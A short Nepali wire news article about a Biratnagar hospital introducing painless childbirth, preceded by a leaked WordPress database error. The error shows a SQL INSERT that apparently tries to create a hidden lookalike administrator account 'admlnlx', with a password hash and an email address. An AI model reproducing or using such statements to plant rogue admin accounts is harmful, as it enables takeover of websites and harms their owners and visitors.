WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFVJAFIDtiAzMdw7ZlFt7wmTSyIPuw0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 13:20:02', '', 'admlnlx', 'admlnlx')
मोरङ, मंसिर २३–
सुरक्षा अस्पताल विराटनगरले पूर्वाञ्चलमै पहिलोपटक पेनलेस (दुखाइ नहुने) प्रसूति सेवा उपलब्ध गराएको छ ।
सो अस्पताल सञ्चालक डा रम्भादेवका अनुसार पूर्वाञ्चलमै पहिलोपटक भित्र्याएको दुखाइ बिनाको प्रसूति सेवाले सुरु गरेको तीन महिनाको अवधिमा एकसय बिमारीलाई सेवा उपलब्ध गराएको छ ।
उहाँले भन्नुभयो, ‘अहिलेसम्म एकसय जनाले सो सेवा उपलब्ध लिइसकेका छन् । अस्पतालका पेन मेनेजमेन्ट विशेषज्ञ डा शैलेशजङ्ग डाँगीले बेलायतबाट सुरु भएको सो सेवा शत्प्रतिशत सुरक्षित र विश्वसनीय रहेको उल्लेख गर्नुभयो ।
सो सेवा लिनुभएकी धनकुटा नगरपालिका–५ की मीना घिमिरेले सो प्रविधिबाट प्रसूति गराउँदा कुनै दुखाइ नभएको बताउनुभयो । उहाँले भन्नुभयो, “प्रसूति गराउँदा कुनै दुखाइ भएन र सहज महसुस भयो ।” –रासस